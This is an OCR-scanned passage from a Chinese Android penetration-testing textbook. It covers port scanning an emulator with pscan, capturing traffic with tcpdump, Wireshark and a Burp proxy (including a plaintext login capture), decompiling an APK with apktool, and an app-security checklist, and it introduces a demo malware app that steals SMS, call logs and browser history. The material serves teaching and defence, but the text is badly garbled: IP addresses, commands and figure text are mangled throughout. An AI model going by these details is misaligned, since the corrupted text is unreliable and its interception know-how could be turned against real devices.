STREAM LISTENING 293 /dev/socket/rild 
STREAM LISTENING 295 /dev/socket/zygote 
STREAM LISTENING 302 /dev/socket/installd 
STREAM LISTENING 304 /dev/socket/keystore 
STREAM LISTENING 311 /dev/socket/qemud 


NNNNNNNNN 





图 5.3 调用 BusyBox 工具 提供 的 netstat 命令 


pentestusri&tools-gibbons-vm-2:-$ adb shell 
€ cd /data/busybox 

€ ./pscan 10.0.2.15 

Scanning 10.0.2.15 ports 1 to 1024 


Port Proto State Service 

BÓ top open unknown 
1023 closed, 1 open，0 timed out ports 
dd 





Fd 5.4 使 用 pscan 命令 扫描 检测 各 端口 


er 











设备 进行 root 处 理 ， 然 后 在 该 设备 上 使 用 像 Wireshark 这 样 的 数据 包 捕 获 分 析 工 具 ; 
另 一 种 是 访问 路 由 器 ， 从 路 由 需 获 取 网 络 中 的 数据 包 。 本 节 中 的 例子 使 用 第 二 种 方 
式 ， 即 利用 安装 在 Linux 系统 上 的 tcpdump 工具 捕获 网 络 中 Android 模拟 器 产生 的 
数据 包 ， 然 后 将 捕获 的 数据 包 使 用 Wireshark 工具 打开 并 分 析 ， 如 图 5.5 所 示 。 

在 用 户 的 工作 电脑 上 ， 执 行 “emulator -tcpdump < output file > -avd < avd de- 
vice name > ”命令 ， 调 用 tepdump 工具 捕获 模拟 器 产生 的 流量 数据 包 。 

图 5. 5 展示 了 被 捕获 的 流量 数据 包 ， 这 些 数据 包产 生 于 Android 模拟 需 使 用 浏 
WEAVE] www. google. com 网 站 。 从 Wireshark 显示 的 数据 包 列 表 中 可 以 看 到 ，DNS 
服务 器 的 IP 地 址 是 10. 0.2.3， 并 且 路 由 器 /网 关 的 IP 地 址 为 10. 0. 2.2。 卫 地 址 为 
10.0.2. 15 的 源 地 址 端 (也 就 是 Android 模拟 器 ) [8] www. google. com 网 站 发 送 了 一 
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Broadcast 
2 6.032939 E Broadcast 
3 6.036452 RealtekU 12:35:02 10.0.2.15 is at 





6 18.036585 10.0.2.2 19.0.2.15 48832 > personal-agent [ACK] Seq=1 Ack=1 Win=8768 Len-8 





7 18.037940 10.0.2.2 10.0.2.15 TCP 48832 > personal-agent [PSH, ACK] Seq=1 Ack-i Win-8760 Len-3l 
8 18.040586 10.0.2.15 190.0.2.2 TCP personal-agent > 48832 [ACK] Seq=1 Ack-32 Win=5840 Len=0 

9 18.064724 10.0.2.15 19.0.2.2 TCP personal-agent > 48832 [PSH, ACK] Seq-1 Ack-32 Win-5848 Len-33 
10 18.064834 190.0.2.2 10.0.2.15 TCP 48832 > personal-agent [ACK] Seq-32 Ack=34 Win-8760 Len-8 

11 54.194217 RealtekU 12:34:56 Broadcast ARP Who has 10.0.2.3? Tell 18.0.2.15 












12 54. 194221 





RealtekU 12:34:56 10.9.2.3 is at 5 









T 74.125.71.99 

16 54.214747 74.125.71.99 18.0.2.15. 

17 54.216875 10.0.2.15 ; 
18 54.307137 10.0.2.15 

5 R 74.125.71.99 





iidididjdddiB 





EP. scunent ot endured a 


图 5.5 1E Wireshark 中 分 析 tepdump 捕获 的 数据 包 


个 HTTP GET 请 求 ， 如 图 $. 6 所 示 。 


pm-nmmm-memmEFPBgOTma- 


S 74.128.71 
56. 54.865054 74. am. m. .99 10.0.2.15 
57 54.865874 74.125.71.99 19.8.2.15 
s 74.125.71.99 — 
BENTL SUN 
..10.9.2.15 
| 38.8.2.15 
62 56.192777. 74.125.71.99 ——— 10,9.2.15 
63 56.192779 74.125.71.99 : 
(64 56.192781 74.125.71.99 
65 56.193381 10.0.2.15 . 
. 66 56.193479 10.9.2.15 — 
67 56.193548 18.9.2.18 - 
68 56.193612 18.9.2.15 - 
69 56.197718 AE 
76 56.197721 74.125.71.99 
71 56.197894 19.8.2.15 
PIT 10.8.2.15 


Frame 59: 748 bytes on wire (5984 bits), 
? Ethernet II, Src: RealtekU : 1 154:00: RealtekU 12:35:02 (52:54:09:12:35:02) 
> Internet Protocol, Src: 10.9.2.15 (10.0.2.15), Dst: 74.125.71.99 (74.125.71.99) 
> Transmission Control Protocol, Src Port: 38045 (38045), Dst Port: http (86), Seq: 431, Ack: 29985, Len: 694 


Host: www.google.com Vrin 

Accept-Encoding: gzip\r\n [s 

Referer: http: //www.google.com/m?clientems-android-google&sourcecandroid-home rn 

Accept-Language: en-USVrAn 

User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; sdk Build/GRI34) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.9 Mobile Safari/533. 












12 35.982 52 54 00 12 34 56 08 

dc 40 00 46 96 b3 4e Ga 00 92 0f 4a 7 
Mee zoe n 7a fi 00 6b eè d2? 
69 20 06 47 45 54 29 21 89 66 


图 5.6 Wireshark 中 数据 包 列 表 显 示 的 HTTP GET 请 求 
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5.2.4 Android 操作 系统 的 漏洞 


Android 操作 系统 (Operating System, OS) 基于 Linux 操作 系统 ，Linux 系统 是 
Android 操作 系统 的 底层 核心 。Android 是 一 种 开源 的 操作 系统 , Google 公司 对 外 开 
放 Android 系统 软件 栈 源码 。 因 此 ， 人 们 可 以 自由 地 开发 和 贡献 / 复 用 Android 系统 
的 源码 。Google 公司 拥有 官方 的 Android 系统 开发 团队 ， 负 责 开 发 、 维 护 官方 的 
Android 系统 发 布 版 本 。 但 是 ， 由 于 Android 系统 开源 、 免 费 的 特点 ， 任 何人 都 可 
以 自由 地 下 载 、 查 看 、 修 改 ， 以 及 发 布 自己 的 Android 系统 版 本 。 很 多 设备 厂商 
(例如 ，HTC、 三 星 等 ) 会 根据 自己 的 需求 定位 ， 修改、 定制 Android 操作 系统 ， 
对 外 却 仍然 称 他 们 生产 的 设备 运行 的 是 “Android” 系统 。 

在 探讨 Android 操作 系统 上 发 现 的 这 类 问题 之 前 ， 首 先 需 要 和 弄 清 究 竞 谁 应 当 为 
这 些 问题 负责 。 是 Google 公司 ?毕竟 它 是 Android 操作 系统 官方 发 布 版 本 的 所 有 
者 。 或 者 是 其 他 移动 设备 厂商 ?比如 像 HTC 等 公司 ， 因 为 他 们 使 用 这 些 免费 的 
Android 操作 系统 ， 并 对 其 做 了 一 定 的 修改 。 

当然 ， 也 可 以 先 绕 过 这 个 问题 。Android 操作 系统 使 用 提供 给 Linux 系统 的 驱 
动 程序 ， 这 些 驱 动 程序 在 设计 时 可 能 并 没有 考虑 安全 问题 。 而 且 ， 许 多 驱动 程序 可 
能 还 存在 老 旧 过 时 的 代码 ， 新 增加 的 代码 通常 建立 在 这 些 代码 之 上 。 所 以 ,这些 底 
层 安 全 问题 的 权 责 并 不 明确 。 

一 些 C/C ++ 代 码 中 的 典型 问题 ， 在 Android 操作 系统 中 也 可 能 出 现 。 比 如 ， 
资源 泄露 、 内 存 骨 溃 、 程 序 执行 流程 问题 、 违 规 数据 访问 ， 以 及 指针 引用 等 问题 。 
此 外 ， 在 这 些 代码 中 ， 通 常 还 会 存在 一 些 “ 死 代码 ”( 也 就 是 不 被 任何 其 他 程序 执 
行 流程 调用 的 代码 ) ， 对 于 这 样 的 代码 ， 需 要 向 用 户 指出 来 ， 加 以 修正 。 























5.3 Android 应 用 程序 渗透 测试 


在 Android 系统 上 ， 大 部 分 的 渗透 测试 都 是 针对 应 用 程序 展开 的 ， 这 些 应 用 程 
序 既 包括 系统 内 置 的 应 用 程序 ， 如 浏览 器 、 地 图 等 应 用 ， 也 包括 其 他 的 第 三 方 应 用 
程序 ， 如 Android 应 用 市 场 上 提供 的 应 用 。 


5.3.1 Android 应 用 程序 


针对 Android 应 用 程序 的 渗透 测试 同 平台 上 其 他 软件 的 测试 一 样 。 在 对 Android 
应 用 程序 进行 渗透 测试 的 过 程 中 ,需要 考虑 的 问题 主要 有 攻击 面 、 组 件 之 间 (内 
部 组 件 和 外 部 组 件 ) 的 交互 、 通 信 ， 以 及 存储 等 问题 。 

攻击 面 : 渗透 测试 只 需 针 对 应 用 程序 的 核心 功能 。 根 据 应 用 程序 具有 的 功能 
村 点 的 不 同 ， 渗 透 测 试 人 员 所 做 的 工作 需要 面向 相对 重要 的 问题 ， 比 如 认证 、 数 据 
操作 等 功能 ， 并 且 测 试 往往 需要 在 相对 底层 的 组 件 上 进行 。 对 于 不 需要 处 理 重 要 数 
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据 的 本 地 组 件 来 说 ， 在 这 类 组 件 上 进行 的 测试 应 当 是 有 所 区 分 的 。 比 如 ， 和 需要 与 
外 部 应 用 程序 /系统 交互 的 组 件 相 比 ， 对 于 这 些 组 件 的 测试 无 需 消 耗 过 多 的 测试 
时 间 。 

组 件 交 互 : 应 用 程序 可 以 使 用 多 种 进程 间 通 信 (IPC) 机 制 同 其 他 Android 应 
用 程序 或 外 部 网 络 服务 器 进行 交互 ， 包 括 基 于 socket (BRF) 的 通信 、 远 程 过 程 
调用 (Remote Procedure Call，RPC)、 传 递 /接收 广播 、 使 用 Intent 组 件 ， 以 及 其 他 
的 一 些 Android 特有 IPC 交互 方式 。 这 些 通信 方式 中 很 多 都 需要 权限 许可 ， 所 以 ， 
针对 如 下 两 个 方面 的 检查 至 关 重 要 。 

e 应 用 程序 请 求 的 权限 。 

e 应 用 程序 对 其 他 应 用 程序 开放 的 功能 。 

读者 应 该 已 经 比较 了 解 了 Android 系统 的 权限 ， 本 书 在 第 4 章 已 经 介绍 了 这 部 
分 概念 。Android 应 用 程序 所 需 的 权限 定义 在 Manifest. xml 文件 内 ， 测 试 人 员 需要 
反 编 译 Android 应 用 程序 的 安装 包 文件 ， 也 就 是 apk 文件 ， 然 后 才能 访问 并 查看 该 
文件 。 反 编译 Android apk 文件 并 取得 相应 的 Manifest. xml 文件 的 步骤 如 图 $.7 和 图 
5. 8 所 示 。 


















































OO O f Anmol — pentestusriGtools-gibbons-vm-2: ~/Android/downloads... 


pentestusrlétools-gibbons-vm-2:-/Android/downloads$ apktool decode iCalendarX ac 
bcad45094de7e877b656db1c28ada2.apk iCal 

I: Baksmaling... 

I: Loading resource table... 

I: Decoding resources... 





I: Loading resource table from file: /home/pentestusrl/apktool/framework/1.apk 
I: Copying assets and libs... 
pentestusri&tools-gibbons-vm-2:-/Android/downloads$ | 

















Kd 5.7 使 用 apktool 工具 提取 Manifest 权限 配置 文件 








apk 文件 由 多 种 文件 打包 而 成 ， 包 括 安 装 包 信息 描述 目录 META-INF、 资 源 文 
件 目 录 res, Android 程序 全 局 配置 文件 AndroidManifest. XML, Dalvik 字 节 人 码 文件 
classes. dex， 以 及 编译 后 的 二 进 制 资源 文件 /目录 resources. arse 等 。apktool 工具 能 
够 用 来 从 一 个 Android 应 用 程序 安装 包 (apk 文件 ) F, JE AndroidManifest. XML 
配置 文件 。 使 用 方法 为 apktool decode <apkname > < directory > 。 

对 于 Android 特有 的 组 件 ， 如 Intent, Broadcast Receiver， 测 试 人 员 至 少 需 要 确 
定 以 下 几 个 问题 : 

1) 不 能 通过 IPC 通信 传递 敏感 数据 。 例 如 ， 不 可 使 用 Intent, broadcast 组 件 
传递 。 

2) 不 能 将 Intent 过 滤 机 制 用 于 确保 应 用 程序 安全 目的 。 尽 管 Intent iE JE PL dil 
能 够 管理 和 控制 应 用 程序 可 以 处 理 的 Intent， 但 是 这 只 对 “ 隐 式 类 型 ”的 Intent 有 
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0O O O A Anmo! — pentestusrl1gtoals-gibbons-vm-2: -/Android/downloads... 


«meta-data android:name-"ADMOB. PUBLISHER. ID" android:value-"al4cff13da97 
c54" /> 
«meta-data android:name-"ADMOB. INTERSTITIAL PUBLISHER ID" android:value- 
"al4ácffi3da97c54" /> 
«meta-data android:names"ADMOB. ALLOW. LOCATION FOR ADS" android:value-"tr 
ue” /> 
«activity android:theme-"&android:style/Theme.NoTitleBar.Fullscreen" and 
roid:name-"com.admob.android.ads.AdMobActivity" android:configChanges-"keyboardl 
keyboardHiddenlorientation" /» | 
«receiver android:name="com.admob.android.ads.analytics.InstallReceiver" 
android:exported-"true"» 
«intent-filter» 
«action android:name-"com,android.vending.INSTALL. REFERRER" /> 
«/intent-filter» 
«/receiver» 
«/application» 
«uses-permission android:names"android.permission.INTERNET" /» 
«uses-permission android:names"android.permission.ACCESS COARSE LOCATION" /> 
«uses-permission android:name="android. permission, RESTART PACKAGES" /> 
«uses-permission android:name-"android.permission.RECEIVE SMS" /» 
«uses-permission android:names"android.permission.SEND, SMS" /> 
«uses-permission android:names"android.permission.SET. WALLPAPER" /> 
«uses-sdk android:minSdkVersions"3" /> 























图 5.8 从 apk 中 提取 的 Manifest 权限 配置 文件 示例 


效 。 应 用 程序 仍 可 以 创建 “ 显 式 类 型 ”的 Intent， 和 迫使 目标 应 用 程序 对 该 Intent 进 





3) 不 能 使 用 粘性 广播 (Sticky Broadcast) 传输 敏感 数据 ， 因 为 发 送 广播 的 应 
用 程序 无 法 控制 该 广播 会 被 哪 一 个 程序 所 接收 。 

4) 应 用 程序 请 求 的 权限 不 能 多 于 其 功能 所 需 的 权限 数量 ， 也 就 是 遵守 最 少 所 
需 权 限 原则 。 

通信 : 确定 应 用 程序 同 外 部 网 络 系统 /服务 器 进行 通信 的 渠道 是 否 安全 是 相当 
重要 的 。 在 这 类 通信 中 ， 建 立 的 连接 应 当 是 经 过 加 密 的 。 此 外 ， 检 查 这 些 与 之 
的 系统 /服务 器 是 如 何 被 选择 的 ， 也 是 同样 重要 的 。 

数据 : 在 应 用 程序 评 佑 中， 最 核心 的 问题 还 是 应 用 程序 处 理 的 数据 。 一 般 的 应 

用 程序 能 够 以 文件 或 数据 库 的 形式 读 写 数据 ， 这 两 种 方式 既 可 以 使 数据 仅 能 对 应 用 

程序 可 读 ， 也 可 以 使 这 些 数据 对 外 可 读 。 如 果 应 用 程序 的 功能 中 包含 敏 感 数 据 的 处 
理 操作 ， 测 试 人 员 就 应 当 谨 慎 地 检查 对 这 些 包含 敏感 数据 的 文件 和 数据 库 进 行 操 作 
的 权限 。 而 且 ， 测 试 人 员 还 应 当 检查 应 用 程序 生成 的 日 志和 共享 配置 文件 2 SUR 
是 否 存在 由 于 开发 者 的 朴 忽 导致 伍 感 数据 暴露 的 问题 。 大 多 数 的 应 用 程序 需要 同 外 
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”共享 配置 文件 (shared preference), Android 系统 的 另 一 种 数据 存储 方式 ， 它 是 一 种 轻 量 级 的 键 值 对 
存储 方式 ， 以 xml 文件 形式 保存 ， 存 储 Android 应 用 程序 需要 的 一 些 配 置 参 数 或 数据 。 一 一 译 者 注 
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部 环境 进行 通信 (或 是 同 外 部 网 络 进 行 通 1 
务 器 /数据 库 上 。 对 于 这 种 情况 ， ae 
务 器 /应 用 程序 上 的 数据 。 此 外 ， 还 需 检 
的 ， 例 如 安全 证 书 等 。 

正确 使 用 加 密 技术 : 测试 人 员 应 当 查 看 应 用 程序 是 否 使 用 了 标准 的 加 密 方法 。 
例如 ， 在 检查 安全 证 书 的 过 程 中 ， 应 用 程序 是 否 检查 了 之 前 批准 的 公 钥 ?应 用 程序 
如 何 验证 安全 证 书 ? 应 用 程序 是 否 进行 了 严格 的 安全 证 书 核实 ? 

向 浏览 器 传递 信息 ( S 测试 人 员 应 当 检 查 应 用 程序 是 否 会 开启 浏览 
器 应 用 程序 ， 如 果 存 在 这 种 操作 ， 该 应 用 程序 是 如 何 传递 相关 参数 的 〈 例 如 ， 应 
用 程序 是 通过 发 送 GET 请 求 ， 还 是 POST 请 求 传递 数据 的 ) 。 

其 他 事项 : 测试 人 员 应 当 检 查 应 用 程序 在 后 台 运 行 的 各 种 服务 ， 查 看 这 些 服务 
对 资源 的 作用 和 影响 。 此 外 ，Android 应 用 程序 的 渗透 测试 还 包括 一 些 额 外 的 步骤。 
由 于 Android 应 用 程序 使 用 Java 语言 编写 ， 因 此 必须 检查 这 些 Java 代码 ， 查 看 是 否 
存在 一 些 典 型 的 Java 程序 漏洞 。 如 果 Android 应 用 程序 中 还 涉及 了 本 地 代码 或 支持 
库 ， 那 么 还 需要 仔细 地 检查 这 些 本 地 代码 或 支持 库 ， 验 证 是 否 有 漏洞 的 存在 。 最 
后 ， 对 Android 应 用 程序 如 何 处 理 数据 存储 问题 的 检查 ， 也 是 一 个 至 关 重 要 的 方 
面 ， 这 部 分 内 容 在 后 面 章 节 将 会 涉及 。 

要 想 检 查 应 用 程序 与 外 界 的 通信 ， 则 需要 配置 一 个 代理 服务 器 ， 用 于 拦截 应 用 
程序 同 外 部 网 络 之 间 的 流量 数据 包 ， 可 采用 如 下 步骤 进行 。 

拦截 浏览 器 (基于 HTTP) 应 用 程序 的 流量 数据 包 : 

1) 在 使 用 的 主机 或 个 人 工作 电脑 上 下 载 并 安装 代理 服务 器 (An, Burp 套 
FOETA), FJA “intercept (拦截 )” 选 项 。 

2) 在 Android 手机 或 模拟 器 上 安装 代理 服务 器 ， 如 图 5.9 所 示 。 在 这 个 示例 
中 ， 本 书 以 一 个 Android 模拟 器 为 例 。 所 以 ， 需 要 使 用 地 址 “10. 0.2.2” 作 为 代理 
服务 器 的 IP 地 址 。 

3) 在 Android 模拟 器 上 打开 浏览 器 应 用 程序 ， 并且 输入 一 个 URL 地 址 。 

4) 查看 Burp 套件 平台 工具 捕获 的 流量 数据 包 ， 如 图 5. 10 和 图 S. 11 所 示 。 

拦截 其 他 应 用 程序 的 流量 数据 包 : 

1) 启动 应 用 程序 ， 本 书 以 互联 网 中 继 聊 天 (Internet Relay Chat, IRC) 应 用 
程序 Yaaic 软件 为 例 ， 如 图 5. 12 所 示 。 

2) 使 用 Wireshark 软件 捕获 该 应 用 程序 产生 的 流量 数据 包 ， 并 且 使 用 其 卫 地 
址 (本 例 中 ，Android 设备 的 IP 地址 为 192. 168.0. 107) 过 滤 筛 选 这 些 数据 包 。 


H), ， 并 且 将 大 量 的 数据 存储 在 远程 的 服 
还 需要 检查 这 些 被 上 传 和 存储 在 异地 服 
这 些 敏感 的 数据 参数 是 如 何 被 传递 /存储 
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O Bup 套件 是 用 于 攻击 web 应 用 程序 的 集成 平台 。 它 包含 了 许多 工具 ， 并 为 这 些 工 具 设 计 了 许多 接口 ， 
以 加 快 攻击 应 用 程序 的 过 程 。 一 一 译 者 注 
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图 5.10 Burp 套件 工具 拦截 的 Android 浏览 器 通信 数据 
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gruyere.appspot.com 
Ccept-Encoding: gzip 
oogle-gruyere.appspot.com/£30081820733/1ogin 

: en-US 
ser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; sdk Build/GRI34) AppleWebKit/533.1 (KHTML, 
ike Gecko) Version/4.0 Mobile Safari/533.1 
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Kd 5.11 Burp 套件 工具 捕获 的 明文 形式 的 安全 证 书 
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BI 5.12 Android 系统 上 的 Yaaic 应 用 软件 
3) 使 用 Wireshark 软件 的 相应 选项 查看 捕获 的 流量 数据 包 ， 如 图 $. 13a 和 b 所 示 。 
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a) 使 用 Wireshark 捕 获 的 Yaaic 通 信 数 据 包 
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b) 使 用 Wireshark 分 析 捕获 的 数据 包 
图 5.13 
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5.3.2 应 用 程序 安全 


前 面 已 经 介绍 了 针对 Android 系统 问题 渗透 测试 的 步骤 。 除 此 以 外 ， 对 于 An- 
droid 应 用 程序 来 说 ， 还 需要 在 程序 的 代码 上 和 设计 上 展开 分 析 (以 及 代码 审查 )， 
检查 一 些 常见 的 安全 漏洞 。 这 些 漏洞 和 问题 可 大 致 地 分 为 以 下 几 类 ， 见 表 5. 1。 

表 5.1 应 用 程序 的 安全 问题 






































































































































安全 问题 说 明 
认证 用 户 识别 的 问题 
访问 控制 认证 之 后 的 用 户 权限 问题 
审核 与 记录 日 志和 审核 的 问题 
加 密 加 密 及 安全 通信 问题 
证 书 处 理 用 户 密码 及 其 他 证 书 处 理 问题 
数据 处 理 针对 敏感 数据 的 处 理 问题 
数据 泄露 有 意 或 无 意 的 信息 泄露 问题 
错误 检测 简洁 报错 问题 
输入 验证 可 靠 用 户 输入 验证 问题 
会 话 管理 户 会 话 管理 最 优 体验 问题 
资源 处 理 资源 处 理 ， 以 及 内 存 管理 问题 
补丁 软件 及 时 修补 /更 新 间 题 


这 些 问 题 需 要 按照 严重 程度 (危险 、 高 风险 、 中 等 风险 和 低 风 险 ) 和 利用 的 
困难 程度 (高 难度 、 中 等 难度 和 易于 发 现 ) 列 出 。 对 表 5.1 列 出 的 部 分 安全 问题 
的 总 结 如 下 : 

1) 认证 问题 : 需要 验证 用 户 证 书 是 否 使 用 了 加 密 通 道 进 行 传输 ， 以 及 采用 的 
认证 机 制 是 否 符合 标准 做 法 。 

2) 访问 控制 : 需要 验证 认证 通过 的 用 户 是 否 仅 能 访问 相应 证 书 授权 的 资源 和 
功能 ， 确 保 用 户 不 能 绕 过 这 些 访问 控制 机 制 。 

3) 日 志 : 通过 验证 ， 确 保 这 些 日 志 没 有 包含 敏感 信息 ， 并 且 不 能 被 其 他 无 关 
的 应 用 程序 所 访问 ， 以 及 需要 为 这 些 证 书 设置 恰当 的 访问 权限 。 

4) 加 密 : 通过 验证 ， 确 保 敏感 信息 只 能 通过 安全 的 通道 进行 传输 ， 并 且 对 这 
类 敏感 信息 的 传输 使 用 了 强大 的 加 密 算法 。 此 外 ， 还 需要 验证 应 用 程序 是 否 使 用 了 
不 恰当 的 加 密 协 议 。 

5) 数据 泄露 . 通过 验证 ,确保 应 用 程序 没有 因为 开发 人 员 的 跑 忽 ， 意 外 地 其 
露 数据 。 应 用 程序 不 应 该 使 用 日 志 、IPC 调用 、URL 调用 和 文件 等 方式 向 其 他 应 用 
程序 提供 数据 。 

6) 数据 验证 : 通过 验证 ， 确 保 应 用 程序 没有 使 用 来 自 非 可 信 源 的 输入 。 例 
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如 ， 直 接 取 用 未 经 处 理 的 用 户 输入 命令 进行 SQL 查询， 以 及 执行 其 他 的 敏感 操作 。 

7) 错误 报告 : 通过 验证 ， 当 应 用 程序 因 出 现 异 常 而 抛 出 错误 时 ， 确 保 抛 出 的 
错误 信息 中 没有 记录 并 上 报 全 部 的 出 错位 置 轨 迹 栈 信息 ， 并 且 在 抛 出 的 错误 信息 
中 ， 没 有 包含 敏感 的 信息 数据 。 

8) 会 话 管理 : 通过 验证 ， 确 保 应 用 程序 在 会 话 管理 上 ， 采 用 了 最 好 的 做 法 和 
手段 。 例 如 ， 超 时 、 会 话 标识 符 和 使 用 令 牌 (Token) ， 等 等 。 

9) URL 参数 : 确保 应 用 程序 没有 以 明文 的 形式 将 敏感 参数 作为 URL. 的 部 分 内 
容 ， 然 后 使 用 URL 传递 这 些 敏 感 参数 信息 。 

10) 可 预测 资源 : 需要 确保 应 用 程序 不 会 产生 易于 猜 出 的 标识 符 或 令 牌 
( Token) 。 

渗透 测试 应 当 根据 下 述 最 佳 做 法 ， 提 供 标 准 的 应 用 程序 测试 流程 。 

1) 在 确定 漏洞 后 ， 应 及 时 修补 支持 库 和 应 用 程序 的 漏洞 ， 打 好 安全 补丁 。 

2) 不 能 将 敏感 信息 (如 SSN (Social Security Number， 社 会 保险 号 )) 作为 
URL 参数 ， 进 行 传递 。URL 内 的 信息 可 以 使 用 GET 请 求 的 方式 来 获取 ， 并 且 会 记 
录 在 很 多 地 方 。 相 对 而 言 ，POST 请 求 方式 可 以 解决 这 个 问题 。 但 是 ， 尽 管 使 用 
POST 请 求 ， 信 息 不 会 出 现在 URL 中 ,， 但 这 种 请 求 的 方式 仍然 会 在 请 求 头 部 字段 中 
泄露 这 些 信息 。 实 际 上 ， 对 于 人 敏感 的 信息 ， 需 要 使 用 HTTPSS 的 连接 方式 进行 传输 
才 可 以 。 

3) 限制 认证 过 程 的 次 数 ， 使 暴力 攻击 的 方式 无 法 实现 破解 认证 的 目的 。 

4) 使 用 安全 套 接 字 层 控制 和 传输 所 有 请 求 的 资源 。 

5) 不 使 用 URL 发 送 会 话 标识 符 。 

6) 使 用 难以 被 猜 出 的 令 牌 (Token) ， 从 而 确保 令 牌 不 易 被 破解 。 

7) 强制 执行 密码 复杂 性 检测 。 

8) 不 在 日 志文 件 内 包含 敏感 信息 ， 并 且 使 用 恰当 的 措施 确保 日 志文 件 的 安 
全 性 。 

9) 对 存储 在 本 地 和 外 部 存储 设备 上 的 文件 进行 加 密 。 

10) 进行 适当 的 数据 验证 ， 防 范 XSS、SQLi， 以 及 命令 注入 等 方式 的 攻击 。 

对 Android 应 用 程序 进行 代码 审查 ， 可 以 确定 以 下 问题 ; 

1) MAWA: 攻击 者 可 以 执行 指定 的 命令 ， 或 者 在 指定 的 环境 中 执行 这 些 命 
， 从 而 绕 过 安全 控制 。 这 方面 比较 典型 的 例子 有 : 在 使 用 SQL 语句 查询 数据 库 
， 用 户 自己 编写 输入 语句 查询 SQLite 数据 库 。 

2) 资源 泄露 ,资源 使 用 后 ( 如 文件 处 理 完毕 等 )， 应 用 程序 没有 释放 这 些 资 
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© HTTPS (Hypertext Transfer Protocol over Secure Socket Layer， 位 于 安全 套 接 字 层 之 上 的 超 文 本 传输 协 
议 ) ， 是 以 安全 为 目标 的 HTTP 通道 ， 即 HTTP 的 安全 版 。 
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源 ， 造 成 这 些 资源 无 法 被 系统 回收 。 这 可 能 导致 性 能 问题 ， 但 也 增加 了 相应 资源 被 
AG XH P7 D HTRRFE $3 EUIS AUS; o 

3) 报错 处 理 : 如 果 开 发 者 没有 考虑 到 特定 问题 的 代码 体系 /代码 执行 流程 ， 
就 会 导致 特定 代码 流程 运行 时 ， 应 用 程序 没有 执行 所 需 的 清理 /访问 控制 检查 ， 引 
起 程序 异常 或 安全 漏洞 问题 。 

4) 不 安全 的 JNI (Java Native Interface, Java 本 地 接口 ) 调用 : Android 应 用 程 
序 能 够 通过 JNI 调用 C 语言 编写 的 本 地 代码 ， 这 有 可 能 使 应 用 程序 遭受 这 些 本 地 代 
码 中 存在 的 底层 问题 的 影响 。 








5.4 其 他 问题 


5.4.1 内 部 、 外 部 以 及 云端 的 数据 存储 

Android 应 用 程序 可 以 使 用 很 多 种 方式 存储 数据 ， 包 括 文件 、 数 据 库 、 共 享 配 
置 文件 ， 以 及 缓存 。 数 据 既 可 以 被 存储 在 内 部 的 存储 器 上 ， 也 可 以 存储 在 外 部 的 存 
储 卡 上 。 然 而 ， 如 果 数 据 使 用 明文 的 形式 存储 在 设备 上 ， 那 么 当 设备 被 恶意 破解 或 
被 偷 时 ， 这 些 数据 资料 将 被 暴露 。 通 常 ， 最 好 的 办 法 是 将 这 些 需 要 存储 的 数据 进行 
加 密 。 所 以 ， 对 于 Android 应 用 程序 来 说 ， 应 当 使 用 一 种 强大 的 加 密 算法 对 需要 存 
储 的 数据 进行 加 密 。 同 这 些 已 公开 的 加 密 工 具 相 比 ， 内 部 加 密 的 安全 效果 最 差 。 

测试 人 员 需 要 检查 如 下 几 个 数据 存储 的 位 置 : 本 地 存储 CHI, Android 应 用 
程序 的 文件 、SQLite 数据 库 、 缓 存 和 共享 配置 文件 ) 和 外 部 存储 (例如 ， 在 外 部 
存储 设备 上 存储 的 文件 、 网 络 “云端 ”存储 ) 。 

代码 审查 用 于 确定 文件 /数据 存储 操作 的 位 置 ， 需 要 审查 的 典型 数据 操作 包括 : 
打开 /创建 文件 、 访 问 文件 夹 及 其 内 容 、 访 问 缓存 /配置 文件 ， 以 及 打开 /创建 数据 
库 等 。 









































5.5 小 结 


本 章 主 要 介绍 了 Android 系统 上 的 渗透 测试 。 介 绍 了 如 何 对 Android 操作 系统 
进行 渗透 测试 ， 讨 论 了 应 用 程序 的 安全 问题 、Android 应 用 程序 的 渗透 测试 ， 以 及 
静态 分 析 。 同 时 ， 还 分 析 了 近期 出 现 的 几 例 Android 应 用 程序 的 安全 问题 。 

建议 读者 下 载 几 个 开源 的 Android 应 用 程序 源码 ， 或 自己 编写 一 个 Android 应 
用 程序 ， 然 后 使 用 本 章 介 绍 的 技术 依次 试验 测试 一 遍 。 读 者 也 可 以 登录 本 书 网 站 下 
载 作者 开发 的 应 用 程序 ， 对 其 进行 测试 。 
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本 章 将 介绍 恶意 软件 的 基础 知识 一 一 如 何 识别 恶意 软件 、 恶 意 软 件 的 行为 ， 以 
人 然后 ， 讨 论 一 个 本 书 作者 编写 的 Android 恶意 应 用 程序 ， 并 通 
过 该 应 用 程序 ， 向 读者 演示 恶意 软件 如 何 绕 过 Android 系统 的 内 置 检 查 机 制 。 

该 Android 恶意 程序 的 功能 包括 : 窃取 用 户 浏览 器 历史 信息 、SMS， 以 及 电话 
呼叫 记录 ， 而 且 该 应 用 还 试图 耗 尽 手机 电量 。 此 外 ， 本 章 还 将 以 另 一 个 应 用 程序 为 
例 ， 向 读者 展示 如 何 对 恶意 软件 进行 逆向 工程 或 分 析 。 通 过 本 章 的 内 容 ， 读 者 将 能 
够 使 用 Java 语言 自行 编写 Android 演示 应 用 程序 ， 熟悉 逆向 工程 相关 工具 ， 并 能 够 
对 各 种 Android 应 用 程序 进行 反 编 译 。 
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逆向 工程 是 通过 分 析 目 标 设备 、 物 体 或 系统 的 结构 、 功 能 ， 以 及 操作 ， 从 而 发 
现 其 技术 原理 的 过 程 9。 一般 ,逆向 工程 需要 对 样本 对 象 (如 机 械 设 备 、 电 子 元 
件 、 软 件 程序 、 生 物 制品 、 化 学 制品 ， 或 有 机 物 ) 进行 拆 纯 或 分 解 ， 具 体 地 分 析 
样本 对 象 在 整体 中 的 运作 细节 ， 或 者 是 设法 制造 一 个 新 的 设备 或 应 用 程序 ， 而 无 需 
使 用 原始 的 样本 对 象 或 仅仅 是 简单 复制 (无 需 理 解 ) 原始 的 样本 对 象 即 可 。 

WS, 一般 用 户 下 载 或 购买 应 用 软件 安装 ， 往 往 不 会 考虑 太 多 这 些 安装 软件 的 
功能 。 简 单 的 几 行 描述 和 用 户 的 评价 可 能 就 是 以 说 服用 户 去 尝试 该 软件 。 除 了 一 些 
知名 软件 〈 如 微软 或 苹果 等 大 型 软件 公司 开发 的 软件 ) ， 或 通过 开源 社区 提供 的 软 
